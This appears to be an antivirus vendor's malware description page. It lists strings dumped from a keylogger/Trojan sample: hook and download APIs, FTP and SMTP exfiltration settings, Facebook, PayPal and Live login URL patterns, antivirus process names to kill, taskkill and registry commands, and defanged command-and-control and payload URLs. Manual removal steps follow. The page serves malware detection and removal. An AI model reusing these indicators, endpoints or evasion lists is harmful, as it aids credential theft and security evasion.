SOFTWARE\Microsoft\Active Setup\Installed Components\%s
RegCreateKeyExA
\system\systwin32.exe
DownloadAndExecute
javaw.exe
GetKeyboardType
InternetOpenUrlA
PR_OpenTCPSocket
GdiplusShutdown
ole32.dll
HTTP/1.1
UnitKeylogger
GetKeyboardLayoutNameA
C:\Windows\tracing
C:\ProgramData\Microsoft\Network\Connections\Pbk
*facebook.*/login.php*
*login.live.*/*post.srf*
*paypal.*/webscr?cmd=_login-submit*
application/x-www-form-urlencoded
Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36
%WinDir%\SysWOW64\svchost.exe
Content-Length: %d
Keylogger
CryptDllConvertPublicKeyInfo
CryptDllEncodePublicKeyAndParameters
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun
KeyHook
KeyboardHookDelegate
[BypassScreening]
HuntHTTPDownload
Webcam
Mozilla Firefox
TcpClient
KeyTLIST=b03
You need a registered nick to join that channel
flood.anope
InternetOpenUrlW
hXXp://VVV.gofuckbiz.com/
hXXp://kremlin.ru/
Opera/7.60 (Windows NT 5.2; U) [en] (IBM EVV/3.0/EAK01AG9/LE)
.fldr
cmd /c taskkill /F /PID
shell32.dll, 3
Scripting.FileSystemObject
autorun.inf
shell32.dll, 2
Icon=%SystemRoot%\system32\SHELL32.dll,7
shell32.dll, 0
\explorer.exe
Kernel32.dll
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
\skype.exe
Project1.exe
\1.txt
\2.txt
Project1xp.exe

Svchost.exe_1456:

`.rsrc
%Program Files% (x86)\Microsoft Visual Studio\VB98\VB6.OLB
urlmon
URLDownloadToFileA
shlwapi.dll
wininet.dll
GetKeyState
GetAsyncKeyState
shell32.dll
ShellExecuteA
kernel32.dll
ntdll.dll
FindExecutableA
WSOCK32.DLL
advapi32.dll
RegOpenKeyExA
RegCloseKey
user32.dll
FtpPutFileA
FtpSetCurrentDirectoryA
SetWindowsHookExA
UnhookWindowsHookEx
PassWord
C:\Windows\SysWow64\Msvbvm60.dll\3
msvbvm60.dll
FC:\Windows\SysWOW64\stdole2.tlb
VBA6.DLL
SSSh8o@
0||||1|1|hXXp://gonjeh.com/gate.php|0|||0||||||||10|0|PA
.text
`.data
.rsrc
hXXp://
gonjeh.com
~.php|#' 0
KERNEL32.DLL
MSVBVM60.DLL
@.OBJ
Microsoft.XmlHttp
application/x-www-form-urlencoded
Firefox 31
} [Keylogger]
ekrn.exe
avastsvc.exe
mbamgui.exe
GDSC.exe
iface.exe
MsMpeng.exe
cfp.exe
avguard.exe
uiSeAgnt.exe
NAV.exe
bdagent.exe
avgui.exe
AdAwareDesktop.exe
op_mon.exe
McSvHost.exe
avp.exe
hXXps://VVV.dropbox.com/s/8qzebad4j8c8igb/plugin.exe?dl=1
\12345.exe
\12345.txt
\System32\svchost.exe
WinHttp.WinHttpRequest.5.1
firefox
chrome
opera
hXXp://schemas.microsoft.com/cdo/configuration/smtpserver
hXXp://schemas.microsoft.com/cdo/configuration/sendusing
hXXp://schemas.microsoft.com/cdo/configuration/smtpserverport
hXXp://schemas.microsoft.com/cdo/
configuration/smtpauthenticate
hXXp://schemas.microsoft.com/cdo/configuration/smtpconnectiontimeout
hXXp://schemas.microsoft.com/cdo/configuration/sendusername
WScript.Shell
hXXp://schemas.microsoft.com/cdo/configuration/sendpassword
hXXp://schemas.microsoft.com/cdo/configuration/smtpusessl
Scripting.FileSystemObject
shell32.dll, 2
shell32.dll, 3
.fldr
shell32.dll, 0
\explorer.exe
wscript.Shell
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
{WINDOWS}
CDO.Message
o en el password
stb.exe

Svchost.exe_1456_rwx_00400000_00024000:

`.rsrc
%Program Files% (x86)\Microsoft Visual Studio\VB98\VB6.OLB
urlmon
URLDownloadToFileA
shlwapi.dll
wininet.dll
GetKeyState
GetAsyncKeyState
shell32.dll
ShellExecuteA
kernel32.dll
ntdll.dll
FindExecutableA
WSOCK32.DLL
advapi32.dll
RegOpenKeyExA
RegCloseKey
user32.dll
FtpPutFileA
FtpSetCurrentDirectoryA
SetWindowsHookExA
UnhookWindowsHookEx
PassWord
C:\Windows\SysWow64\Msvbvm60.dll\3
msvbvm60.dll
FC:\Windows\SysWOW64\stdole2.tlb
VBA6.DLL
SSSh8o@
0||||1|1|hXXp://gonjeh.com/gate.php|0|||0||||||||10|0|PA
.text
`.data
.rsrc
hXXp://
gonjeh.com
~.php|#' 0
KERNEL32.DLL
MSVBVM60.DLL
@.OBJ
Microsoft.XmlHttp
application/x-www-form-urlencoded
Firefox 31
} [Keylogger]
ekrn.exe
avastsvc.exe
mbamgui.exe
GDSC.exe
iface.exe
MsMpeng.exe
cfp.exe
avguard.exe
uiSeAgnt.exe
NAV.exe
bdagent.exe
avgui.exe
AdAwareDesktop.exe
op_mon.exe
McSvHost.exe
avp.exe
hXXps://VVV.dropbox.com/s/8qzebad4j8c8igb/plugin.exe?dl=1
\12345.exe
\12345.txt
\System32\svchost.exe
WinHttp.WinHttpRequest.5.1
firefox
chrome
opera
hXXp://schemas.microsoft.com/cdo/configuration/smtpserver
hXXp://schemas.microsoft.com/cdo/configuration/sendusing
hXXp://schemas.microsoft.com/cdo/configuration/smtpserverport
hXXp://schemas.microsoft.com/cdo/
configuration/smtpauthenticate
hXXp://schemas.microsoft.com/cdo/configuration/smtpconnectiontimeout
hXXp://schemas.microsoft.com/cdo/configuration/sendusername
WScript.Shell
hXXp://schemas.microsoft.com/cdo/configuration/sendpassword
hXXp://schemas.microsoft.com/cdo/configuration/smtpusessl
Scripting.FileSystemObject
shell32.dll, 2
shell32.dll, 3
.fldr
shell32.dll, 0
\explorer.exe
wscript.Shell
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
{WINDOWS}
CDO.Message
o en el password
stb.exe


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    cCtWRS.exe:1936
    lssis.exe:492
    SdJshk.exe:1584
    %original file name%.exe:1772

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temp\Svchost.exe (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\aut7.tmp (196 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\TsTEFE.txt (3651 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\fLBYTh (2161 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\aut4.tmp (3057 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\aut5.tmp (3057 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\SdJshk.exe (10322 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\aut6.tmp (2145 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\QjlCDo (2161 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\EqEhol.txt (27193 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\aut3.tmp (196 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\aut1.tmp (3057 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\cCtWRS.exe (5161 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\aut2.tmp (9845 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now